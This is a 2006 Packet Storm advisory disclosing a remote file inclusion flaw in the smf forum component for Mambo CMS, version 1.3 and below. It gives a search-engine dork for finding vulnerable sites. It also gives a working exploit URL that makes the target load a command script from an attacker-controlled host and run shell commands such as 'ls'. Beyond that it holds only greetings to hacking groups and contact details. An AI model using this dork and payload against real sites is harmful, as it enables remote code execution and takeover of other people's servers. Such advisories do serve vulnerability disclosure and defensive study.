smf.txt

2006-07-12T00:00:00
ID PACKETSTORM:48164
Type packetstorm
Reporter OLiBekaS
Modified 2006-07-12T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------------------  
  
Title : smf forum for Mambo CMS <= 1.3 Remote File Include Vulnerabilities  
  
###############################################################################  
  
Discovered By OLiBekaS  
  
-----------------------------------------------------------------------------  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : component for Mambo CMS  
version : 1.3  
  
-----------------------------------------------------------------------------  
  
bug found in file : smf.php  
  
dork : allinurl:"com_smf"  
  
Exploit :   
  
http://[target]/[path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls   
  
------------------------------------------------------------------------------  
  
greatz:  
~~~~~  
  
# Special greetz to my master effex and bEdAh`oTaK ( thank man )  
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other  
  
-------------------------------------------------------------------------------  
  
  
Contact:  
~~~~~~~  
  
Nick: OLiBekaS  
E-mail: olibekas[at]gmail[dot]Com  
Homepage: http://bekas.6te.net  
  
--------------------------------- [ eof ] ---------------------------------------`